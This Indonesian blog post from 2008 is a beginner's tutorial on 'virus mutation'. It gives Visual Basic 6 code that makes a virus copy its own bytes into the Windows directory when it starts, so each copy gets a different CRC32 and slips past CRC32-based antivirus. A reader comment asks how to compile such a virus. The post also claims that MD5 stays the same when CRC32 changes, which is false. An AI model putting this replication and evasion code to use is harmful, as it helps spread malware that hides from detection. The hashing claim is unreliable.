MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Tehnik Mutasi Virus

Posted by Morphic pada Oktober 14, 2008


Yoooo
Aku sarankan bagi kalian yang udah master jangan baca tutorial ini.
Just for newbie!

Oke langsung aja. Aku akan menjelaskan bagaimana sebuah virus memiliki lebih dari satu crc32. Dan yang pasti virus ini akan lolos dari cengkeraman antivirus yang berbasis crc32. (Nampaknya artikel ini bikin kontroversi aja!)

Agar sebuah virus punya banyak crc32 dan md5, virus tak membutuhkan ”Filecopy” untuk berduplikasi atau dengan katalain beranak-cucu.

Sekarang tinggalkan kebiasaanmu menggunakan ”Filecopy” untuk duplikasi virus. Sekarang ada cara baru dan aku yakin udah banyak master virus yang tahu soal ini.
Biasanya dulu kamu diajari oleh ”nenek moyangmu” untuk menduplikasikan virus dengan kode berikut ini:

Filecopy App.path & ”\” & App.EXEName & ”.exe”, bla bla bla & ”.exe”

Otomatis dengan cara itu, virus cuma punya satu crc32 saja!
Tapi gimana kalau dengan kode dibawah ini:

Function MutasiKe (Lokasi As String)
ReDim KodeVirus(FileLen(App.Path & “\” & App.EXEName & “.exe”))As Byte
Open App.Path & “\” & App.EXEName & “.exe” For Binary As #1
Get #1, , KodeVirus
Close #1
Open Lokasi For Binary As #1
Put #1, , KodeVirus
Close #1
End Function
Private Sub Form_Load()
Bla bla bla….
MutasiKe Environ$(“windir”) & “\Yooooo.exe”
End Sub

Dengan kode ini pasti crc32 virus induk dengan virus anak punya crc32 yang berbeda. Memang kejahatan IT selalu berkembang, Bung!! (Aku ngutip omongan seseorang(aku lupa orangnya siapa))
Tapi selalu saja ada yang bisa menangkal kejahatan!
Misalnya untuk mengatasi masalah virus (yang udah pake cara diatas) bisa dengan cara MD5. Meskipun crc32 berbeda, tapi MD5-nya tetap sama!
Bahkan lebih dari 10 crc32 sekalipun, tetap saja MD5-nya sama!

Mungkin sekian tutorial saya, Thanks buat newbie dan para master yang udah baca!!

Download Morphost Antivirus [ http://morphic.4shared.com ]
Download database Morphost dan konco-konconya [ http://morphic.4shared.com ]
Download tutorial Morphic [ http://morphic.4shared.com ]

My Friendster [ http://www.friendster.com/morphic ]
My Email + My YM [ karta_morphic@yahoo.co.id ]
My website [ www.morphostlab.co.nr ]

By: Morphic

3 Tanggapan to “Tehnik Mutasi Virus”

  1. zone said

    wah…..hebat bget..
    saya se pemula nih..

    tanya boleh tow…

    ne habis nulis kode virus di VB 6.0, trus ben bisa jalan virusnya(jadi.exe) gimana ya….

    makasih

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: